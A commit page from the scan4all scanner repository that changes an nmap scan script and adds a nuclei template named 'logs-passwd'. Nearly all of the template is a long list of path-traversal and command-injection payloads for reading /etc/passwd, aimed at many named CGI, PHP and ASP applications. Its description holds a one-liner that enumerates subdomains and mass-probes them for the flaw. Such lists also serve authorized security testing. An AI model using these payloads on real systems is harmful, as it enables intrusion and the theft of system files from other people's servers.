STRLCPY/scan4all

up PoCs 2022-08-25
hktalent committed 2 years ago

a0d76c5a

1 parent 0ddf7f5d

Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)

■ ■ ■ ■ ■ ■

config/doNmapScan.sh

		skipped 4 lines
5	5		# -F --top-ports=65535
6	6		# -p 80,443
7	7		# -sV 得到的指纹信息更准，但是更慢
8		-	echo $PPSSWWDD\|sudo -S nmap -F -sV --top-ports=65535 -n --unique --resolve-all -Pn -sU -sS --min-hostgroup 64 --max-retries 0 --host-timeout 10m --script-timeout 3m --version-intensity 9 --min-rate ${XRate} -T4 -iL $1 -oX $2
	8	+	echo $PPSSWWDD\|sudo -S nmap -F --top-ports=65535 -n --unique --resolve-all -Pn -sU -sS --min-hostgroup 64 --max-retries 0 --host-timeout 10m --script-timeout 3m --version-intensity 9 --min-rate ${XRate} -T4 -iL $1 -oX $2
9	9		else
10		-	echo $PPSSWWDD\|sudo -S nmap -F -sV --top-ports=65535 -n --unique --resolve-all -Pn -sU -sS --min-hostgroup 64 --max-retries 0 --host-timeout 10m --script-timeout 3m --version-intensity 9 --min-rate ${XRate} -T4 $1 -oX $2
	10	+	echo $PPSSWWDD\|sudo -S nmap -F --top-ports=65535 -n --unique --resolve-all -Pn -sU -sS --min-hostgroup 64 --max-retries 0 --host-timeout 10m --script-timeout 3m --version-intensity 9 --min-rate ${XRate} -T4 $1 -oX $2
11	11		fi
12	12		}
13	13		doMasScan $1 $2
		skipped 1 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/51pwn/pay001.yaml

1	+	id: logs-passwd
2	+	info:
3	+	name: logs-passwd
4	+	severity: high
5	+	author:
6	+	- 51pwn
7	+	description: \|-
8	+	cat rootDomains.txt \| assetfinder -subs-only \| httpx -silent -nc -p 80,443,8080,8443,9000,9001,9002,9003,8888,8088,8808 -path "/logs/downloadMainLog?fname=../../../../../../..//etc/passwd" -mr "root:x:" -t 60
9	+
10	+	requests:
11	+	- raw:
12	+	- \|
13	+	GET /{{path1}} HTTP/1.1
14	+	Host: {{Hostname}}
15	+	Content-Type: application/x-www-form-urlencoded; charset=UTF-8
16	+
17	+	payloads:
18	+	path1:
19	+	- "%00../../../../../../etc/passwd"
20	+	- "%00/etc/passwd%00"
21	+	- "%0a/bin/cat%20/etc/passwd"
22	+	- "%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
23	+	- "..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd"
24	+	- "................../etc/passwd"
25	+	- "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd"
26	+	- "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd"
27	+	- "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd"
28	+	- "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd"
29	+	- "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd"
30	+	- "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd"
31	+	- "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd"
32	+	- "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd"
33	+	- "....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd"
34	+	- "....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd"
35	+	- "....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd"
36	+	- "....//....//....//....//....//....//....//....//....//....//....//etc/passwd"
37	+	- "....//....//....//....//....//....//....//....//....//....//etc/passwd"
38	+	- "....//....//....//....//....//....//....//....//....//etc/passwd"
39	+	- "....//....//....//....//....//....//....//....//etc/passwd"
40	+	- "....//....//....//....//....//....//....//etc/passwd"
41	+	- "....//....//....//....//....//....//etc/passwd"
42	+	- "....//....//....//....//....//etc/passwd"
43	+	- "....//....//....//....//etc/passwd"
44	+	- "....//....//....//etc/passwd"
45	+	- "....//....//etc/passwd"
46	+	- "....//etc/passwd"
47	+	- ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
48	+	- ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
49	+	- ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
50	+	- ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
51	+	- ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
52	+	- ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
53	+	- ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
54	+	- ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
55	+	- ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
56	+	- ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
57	+	- ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
58	+	- ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
59	+	- ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
60	+	- ....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
61	+	- ....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
62	+	- ....\/....\/....\/....\/....\/....\/....\/etc/passwd
63	+	- ....\/....\/....\/....\/....\/....\/etc/passwd
64	+	- ....\/....\/....\/....\/....\/etc/passwd
65	+	- ....\/....\/....\/....\/etc/passwd
66	+	- ....\/....\/....\/etc/passwd
67	+	- ....\/....\/etc/passwd
68	+	- ....\/etc/passwd"
69	+	- ".../.../.../.../.../.../.../.../.../.../etc/passwd"
70	+	- "../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
71	+	- "../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00"
72	+	- "../../../../../../../../../../../../../../../../../../../../../etc/passwd"
73	+	- "../../../../../../../../../../../../../../../../../../../../../etc/passwd%00"
74	+	- "../../../../../../../../../../../../../../../../../../../../etc/passwd"
75	+	- "../../../../../../../../../../../../../../../../../../../../etc/passwd%00"
76	+	- "../../../../../../../../../../../../../../../../../../../etc/passwd"
77	+	- "../../../../../../../../../../../../../../../../../../../etc/passwd%00"
78	+	- "../../../../../../../../../../../../../../../../../../etc/passwd"
79	+	- "../../../../../../../../../../../../../../../../../../etc/passwd%00"
80	+	- "../../../../../../../../../../../../../../../../../etc/passwd"
81	+	- "../../../../../../../../../../../../../../../../../etc/passwd%00"
82	+	- "../../../../../../../../../../../../../../../../etc/passwd"
83	+	- "../../../../../../../../../../../../../../../../etc/passwd%00"
84	+	- "../../../../../../../../../../../../../../../etc/passwd"
85	+	- "../../../../../../../../../../../../../../../etc/passwd%00"
86	+	- "../../../../../../../../../../../../../../etc/passwd"
87	+	- "../../../../../../../../../../../../../../etc/passwd%00"
88	+	- "../../../../../../../../../../../../../etc/passwd"
89	+	- "../../../../../../../../../../../../../etc/passwd%00"
90	+	- "../../../../../../../../../../../../etc/passwd"
91	+	- "../../../../../../../../../../../../etc/passwd%00"
92	+	- "../../../../../../../../../../../etc/passwd"
93	+	- "../../../../../../../../../../../etc/passwd%00"
94	+	- "../../../../../../../../../../etc/passwd"
95	+	- "../../../../../../../../../../etc/passwd%00"
96	+	- "../../../../../../../../../etc/passwd"
97	+	- "../../../../../../../../../etc/passwd%00"
98	+	- "../../../../../../../../etc/passwd"
99	+	- "../../../../../../../../etc/passwd%00"
100	+	- "../../../../../../../etc/passwd"
101	+	- "../../../../../../../etc/passwd%00"
102	+	- "../../../../../../etc/passwd"
103	+	- "../../../../../../etc/passwd%00"
104	+	- "../../../../../../etc/passwd&=%3C%3C%3C%3C"
105	+	- "../../../../../etc/passwd"
106	+	- "../../../../../etc/passwd%00"
107	+	- "../../../../etc/passwd"
108	+	- "../../../../etc/passwd%00"
109	+	- "../../../etc/passwd"
110	+	- "../../../etc/passwd%00"
111	+	- "../../etc/passwd"
112	+	- "../../etc/passwd%00"
113	+	- "../etc/passwd"
114	+	- "../etc/passwd%00"
115	+	- ".\\./.\\./.\\./.\\./.\\./.\\./etc/passwd"
116	+	- "%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
117	+	- "%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
118	+	- "..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd"
119	+	- "../../../../../../../../../../../etc/passwd%00.html"
120	+	- "../../../../../../../../../../../etc/passwd%00.jpg"
121	+	- "../../../../../../../../../../etc/passwd"
122	+	- "../../../../../../../../../../etc/passwd^^"
123	+	- /..\../..\../..\../..\../..\../..\../etc/passwd
124	+	- "./././././././././././etc/passwd"
125	+	- "//////../../../../../../etc/passwd"
126	+	- "//////../../../etc/passwd"
127	+	- "/etc/passwd"
128	+	- "apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/"
129	+	- "cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd"
130	+	- "cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
131	+	- "etc/passwd"
132	+	- "etc/passwd%00"
133	+	- "etc/passwd-"
134	+	- "etc/passwd~"
135	+	- "logs/downloadMainLog?fname=../../../../../../..//etc/passwd"
136	+	- "src/etc/passwd"
137	+	- "14all-1.1.cgi?cfg=../../../../../../../../etc/passwd"
138	+	- "14all.cgi?cfg=../../../../../../../../etc/passwd"
139	+	- "DomainFiles/*//../../../../../../../../../../etc/passwd"
140	+	- "FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd"
141	+	- "FileSeek.cgi?head=&foot=;cat%20/etc/passwd"
142	+	- "FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot="
143	+	- "FileSeek.cgi?head=;cat%20/etc/passwd\|&foot="
144	+	- "FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd"
145	+	- "FileSeek2.cgi?head=&foot=;cat%20/etc/passwd"
146	+	- "FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot="
147	+	- "FileSeek2.cgi?head=;cat%20/etc/passwd\|&foot="
148	+	- "PHPMYADMINexport.php?what=../../../../../../../../../../../../etc/passwd%00"
149	+	- "PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd"
150	+	- "ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00"
151	+	- "Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html"
152	+	- "YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00"
153	+	- "\\'/bin/cat%20/etc/passwd\\'"
154	+	- "a1disp3.cgi?../../../../../../../../../../etc/passwd"
155	+	- "a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd"
156	+	- "a1stats/a1disp3.cgi?../../../../../../../etc/passwd"
157	+	- "a1stats/a1disp4.cgi?../../../../../../../etc/passwd"
158	+	- "admin.cgi?list=../../../../../../../../../../etc/passwd"
159	+	- "admin/exec.php3?cmd=cat%20/etc/passwd"
160	+	- "admin/system.php3?cmd=cat%20/etc/passwd"
161	+	- "albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd"
162	+	- "anacondaclip.pl?template=../../../../../../../../../../etc/passwd"
163	+	- "apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/"
164	+	- "athenareg.php?pass=%20;cat%20/etc/passwd"
165	+	- "atomicboard/index.php?location=../../../../../../../../../../etc/passwd"
166	+	- "auktion.cgi?menue=../../../../../../../../../../etc/passwd"
167	+	- "autohtml.php?op=modload&mainfile=x&name=/etc/passwd"
168	+	- "base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1"
169	+	- "basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu"
170	+	- "bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd"
171	+	- "bb-hist?HISTFILE=../../../../../../../../../../etc/passwd"
172	+	- "bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd"
173	+	- "bigconf.cgi?command=view_textfile&file=/etc/passwd&filters="
174	+	- "book.cgi?action=default&current=\|cat%20/etc/passwd\|&form_tid=996604045&prev=main.html&list_message_index=10"
175	+	- "cal_make.pl?p0=../../../../../../../../../../etc/passwd%00"
176	+	- "calendar/calendar_admin.pl?config=\|cat%20/etc/passwd\|"
177	+	- "calendar_admin.pl?config=\|cat%20/etc/passwd\|"
178	+	- "campas?%0acat%0a/etc/passwd%0a"
179	+	- "cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd"
180	+	- "cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd"
181	+	- "cgi-bin/FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd"
182	+	- "cgi-bin/FileSeek.cgi?head=&foot=;cat%20/etc/passwd"
183	+	- "cgi-bin/FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot="
184	+	- "cgi-bin/FileSeek.cgi?head=;cat%20/etc/passwd\|&foot="
185	+	- "cgi-bin/FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd"
186	+	- "cgi-bin/FileSeek2.cgi?head=&foot=;cat%20/etc/passwd"
187	+	- "cgi-bin/FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot="
188	+	- "cgi-bin/FileSeek2.cgi?head=;cat%20/etc/passwd\|&foot="
189	+	- "cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00"
190	+	- "cgi-bin/a1disp3.cgi?../../../../../../../../../../etc/passwd"
191	+	- "cgi-bin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd"
192	+	- "cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd"
193	+	- "cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd"
194	+	- "cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd"
195	+	- "cgi-bin/anacondaclip.pl?template=../../../../../../../../../../etc/passwd"
196	+	- "cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/"
197	+	- "cgi-bin/auktion.cgi?menue=../../../../../../../../../../etc/passwd"
198	+	- "cgi-bin/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd"
199	+	- "cgi-bin/bb-hist?HISTFILE=../../../../../../../../../../etc/passwd"
200	+	- "cgi-bin/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd"
201	+	- "cgi-bin/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters="
202	+	- "cgi-bin/book.cgi?action=default&current=\|cat%20/etc/passwd\|&form_tid=996604045&prev=main.html&list_message_index=10"
203	+	- "cgi-bin/cal_make.pl?p0=../../../../../../../../../../etc/passwd%00"
204	+	- "cgi-bin/calendar/calendar_admin.pl?config=\|cat%20/etc/passwd\|"
205	+	- "cgi-bin/calendar_admin.pl?config=\|cat%20/etc/passwd\|"
206	+	- "cgi-bin/campas?%0acat%0a/etc/passwd%0a"
207	+	- "cgi-bin/cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00"
208	+	- "cgi-bin/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html"
209	+	- "cgi-bin/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd"
210	+	- "cgi-bin/csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')"
211	+	- "cgi-bin/csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')"
212	+	- "cgi-bin/csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')"
213	+	- "cgi-bin/csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')"
214	+	- "cgi-bin/csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`"
215	+	- "cgi-bin/db4web_c/dbdirname//etc/passwd"
216	+	- "cgi-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00"
217	+	- "cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00"
218	+	- "cgi-bin/emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00"
219	+	- "cgi-bin/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00"
220	+	- "cgi-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00"
221	+	- "cgi-bin/ezshopper/loadpage.cgi?user_id=1&file=\|cat%20/etc/passwd\|"
222	+	- "cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1"
223	+	- "cgi-bin/faqmanager.cgi?toc=/etc/passwd%00"
224	+	- "cgi-bin/faxsurvey?cat%20/etc/passwd"
225	+	- "cgi-bin/formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test"
226	+	- "cgi-bin/formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test"
227	+	- "cgi-bin/formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test"
228	+	- "cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1"
229	+	- "cgi-bin/guestbook.cgi?user=cpanel&template=\|/bin/cat%20/etc/passwd\|"
230	+	- "cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00"
231	+	- "cgi-bin/htgrep?file=index.html&hdr=/etc/passwd"
232	+	- "cgi-bin/htmlscript?../../../../../../../../../../etc/passwd"
233	+	- "cgi-bin/htsearch?exclude=%60/etc/passwd%60"
234	+	- "cgi-bin/ion-p?page=../../../../../etc/passwd"
235	+	- "cgi-bin/loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd"
236	+	- "cgi-bin/magiccard.cgi?pa=3Dpreview&next=3Dcustom&page=3D../../../../../../../../../../etc/passwd"
237	+	- "cgi-bin/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00"
238	+	- "cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00"
239	+	- "cgi-bin/main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd"
240	+	- "cgi-bin/mrtg.cfg?cfg=../../../../../../../../etc/passwd"
241	+	- "cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd"
242	+	- "cgi-bin/multihtml.pl?multi=/etc/passwd%00html"
243	+	- "cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd"
244	+	- "cgi-bin/newsdesk.cgi?t=../../../../../../../../../../etc/passwd"
245	+	- "cgi-bin/nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00"
246	+	- "cgi-bin/opendir.php?/etc/passwd"
247	+	- "cgi-bin/pals-cgi?palsAction=restart&documentName=/etc/passwd"
248	+	- "cgi-bin/pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd\|'"
249	+	- "cgi-bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd"
250	+	- "cgi-bin/pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd\|'"
251	+	- "cgi-bin/pfdisplay.cgi?../../../../../../etc/passwd"
252	+	- "cgi-bin/phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd"
253	+	- "cgi-bin/phf?Qname=root%0Acat%20/etc/passwd%20"
254	+	- "cgi-bin/php.cgi?/etc/passwd"
255	+	- "cgi-bin/powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd"
256	+	- "cgi-bin/publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd\|&output_number=10"
257	+	- "cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id="
258	+	- "cgi-bin/r.cgi?FILE=../../../../../../../../../../etc/passwd"
259	+	- "cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1"
260	+	- "cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00"
261	+	- "cgi-bin/sendtemp.pl?templ=../../../../../../../../../../etc/passwd"
262	+	- "cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd"
263	+	- "cgi-bin/shop.cgi?page=../../../../../../../etc/passwd"
264	+	- "cgi-bin/shopper.cgi?newpage=../../../../../../../../../../etc/passwd"
265	+	- "cgi-bin/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd\|"
266	+	- "cgi-bin/simple/view_page?mv_arg=\|cat%20/etc/passwd\|"
267	+	- "cgi-bin/smartsearch.cgi?keywords=\|/bin/cat%20/etc/passwd\|"
268	+	- "cgi-bin/smartsearch/smartsearch.cgi?keywords=\|/bin/cat%20/etc/passwd\|"
269	+	- "cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
270	+	- "cgi-bin/store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html"
271	+	- "cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd"
272	+	- "cgi-bin/story.pl?next=../../../../../../../../../../etc/passwd%00"
273	+	- "cgi-bin/story/story.pl?next=../../../../../../../../../../etc/passwd%00"
274	+	- "cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1"
275	+	- "cgi-bin/technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd"
276	+	- "cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd"
277	+	- "cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd"
278	+	- "cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd"
279	+	- "cgi-bin/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00"
280	+	- "cgi-bin/viewsource?/etc/passwd"
281	+	- "cgi-bin/way-board.cgi?db=/etc/passwd%00"
282	+	- "cgi-bin/way-board/way-board.cgi?db=/etc/passwd%00"
283	+	- "cgi-bin/webbbs/webbbs_config.pl?name=joe&[email protected]&body=aaaaffff&followup=10;cat%20/etc/passwd"
284	+	- "cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd\|&CODE=PHOLD"
285	+	- "cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd"
286	+	- "cgi-bin/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00"
287	+	- "cgi-bin/webplus?script=../../../../../../../../../../etc/passwd"
288	+	- "cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd"
289	+	- "cgi-bin/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd"
290	+	- "cgi-bin/whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd"
291	+	- "cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd"
292	+	- "cgi-bin/zml.cgi?file=../../../../../../../../../../etc/passwd%00"
293	+	- "cgi-shop/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00"
294	+	- "cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00"
295	+	- "commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html"
296	+	- "common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd"
297	+	- "content/base/build/explorer/none.php?/etc/passwd"
298	+	- "csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')"
299	+	- "csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')"
300	+	- "csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')"
301	+	- "csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')"
302	+	- "csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`"
303	+	- "current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00"
304	+	- "current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1"
305	+	- "db4web_c/dbdirname//etc/passwd"
306	+	- "dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00"
307	+	- "dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00"
308	+	- "dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00"
309	+	- "directory.php?dir=%3Bcat%20/etc/passwd"
310	+	- "directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00"
311	+	- "edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd"
312	+	- "emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00"
313	+	- "emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00"
314	+	- "emumail.cgi?type=/../../../../../../../../../../../../../../../etc/passwd%00"
315	+	- "emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00"
316	+	- "etc/passwd"
317	+	- "ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1"
318	+	- "ezshopper/loadpage.cgi?user_id=1&file=\|cat%20/etc/passwd\|"
319	+	- "ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1"
320	+	- "faqmanager.cgi?toc=/etc/passwd%00"
321	+	- "faxsurvey?cat%20/etc/passwd"
322	+	- "formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test"
323	+	- "formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test"
324	+	- "formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test"
325	+	- "forum-ra.asp?n=../../../../../../../../../etc/passwd"
326	+	- "forum-ra.asp?n=../../../../../../../../../etc/passwd%00"
327	+	- "forum-ra.asp?n=/etc/passwd"
328	+	- "forum-ra.asp?n=/etc/passwd%00"
329	+	- "forum-ra_professionnel.asp?n=%60/etc/passwd%60"
330	+	- "forum-ra_professionnel.asp?n=../../../../../../../../../etc/passwd%00"
331	+	- "forum-ra_professionnel.asp?n=/../../../../../../etc/passwd"
332	+	- "forum-ra_professionnel.asp?n=/../../../etc/passwd"
333	+	- "forum-ra_professionnel.asp?n=/etc/passwd"
334	+	- "forum-ra_professionnel.asp?n=/etc/passwd%00"
335	+	- "forum.asp?n=%60/etc/passwd%60\|41\|80040e14\|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'."
336	+	- "forum.asp?n=../../../../../../../../../etc/passwd%00\|41\|80040e14\|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'."
337	+	- "forum.asp?n=/../../../../../../etc/passwd\|41\|80040e14\|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'."
338	+	- "forum.asp?n=/../../../etc/passwd\|41\|80040e14\|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'."
339	+	- "forum.asp?n=/etc/passwd%00\|41\|80040e14\|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'."
340	+	- "forum.asp?n=/etc/passwd\|41\|80040e14\|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'."
341	+	- "forum1.asp?n=%60/etc/passwd%60&nn=269\|200\|800a0bcd\|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record."
342	+	- "forum1.asp?n=../../../../../../../../../etc/passwd%00&nn=269\|200\|800a0bcd\|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record."
343	+	- "forum1.asp?n=/../../../../../../etc/passwd&nn=269\|200\|800a0bcd\|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record."
344	+	- "forum1.asp?n=/../../../etc/passwd&nn=269\|200\|800a0bcd\|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record."
345	+	- "forum1.asp?n=/etc/passwd%00&nn=269\|200\|800a0bcd\|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record."
346	+	- "forum1.asp?n=/etc/passwd&nn=269\|200\|800a0bcd\|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record."
347	+	- "forum1.asp?n=1753&nn=%60/etc/passwd%60"
348	+	- "forum1.asp?n=1753&nn=../../../../../../../../../../etc/passwd"
349	+	- "forum1.asp?n=1753&nn=../../../../../../../../../../etc/passwd%00"
